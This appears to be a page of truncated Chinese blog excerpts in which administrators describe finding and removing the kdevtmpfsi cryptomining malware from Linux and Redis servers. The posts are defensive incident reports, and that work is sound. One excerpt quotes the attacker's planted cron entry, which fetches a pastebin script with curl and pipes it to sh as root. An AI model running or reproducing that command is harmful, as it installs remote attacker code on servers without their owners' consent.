背景 新接手了個環境，同事交接時說這些機器中過挖礦病毒還沒重裝，我TM。。。 線上環境不好動，只能手動查殺了。 操作系統如下： 過程 ssh上去，ps -ef看到如下： 手動kill掉進程，很快會生成新的，猜測有守護進程。用STOP信號讓它停止。 查看定時任務清理 ...

病毒名稱：kdevtmpfsi 狀態：CPU爆滿，導致線上服務宕機。 圖片是盜的，進程占用是真實的。 1、# top 查看cpu占用情況，找到占用cpu的進程 最后是 kdevtmpfsi 2、# netstat ...

概述： 9.4號臨時接到通知讓一個人去應急，第一次應急，比較虛，到客戶那里了解了一下情況。主要現象是流量異常，CPU占用過高。 發現連接數超多-17779，然后在試圖連接其他主機的22端口 發現異常進程，當初進行殺死之后，從九點到晚上十點cpu都是正常的，然后上午通過查看日志last ...

最近公司服務器上redis總是過幾天就斷一次，之前一直好好的，然后就上服務器上去看。一看發現內存占用變成92%，然后有兩個cpu占用100%。使用top命令查看后，發現redis有兩個進程占了很大資源，這兩個進程就是kdevtmpfsi。 然后就開始百度，百度結果是先停止 ...

起因 偶然間發現redis里有一個陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的，再看value我警覺了，這是要定時執行腳本啊。 分析 ...

　　　　背景：由於公司業務需要，職務由自動化測試，變更服務器后端開發。於是在網上購置了雲服務器，寫了一個簡單的后台demo，部署在服務器上做測試。整個項目是以docker封裝redis，mysql，dockerfile封裝springboot項目，由於是個人做練習用服務器，基本沒大流量情況，在項目 ...

發現CPU直接100% ...

服務器CPU占用100%，導致http請求無法進行top命令查看進程占用，發現kdevtmpfsi進程占用95%甚至更多netstat -natp 命令查看是否有異常陌生IP的TCP連接，查詢到有來自國外的陌生IP，做了白名單處理 kdevtmpfsi進程解決辦法 ...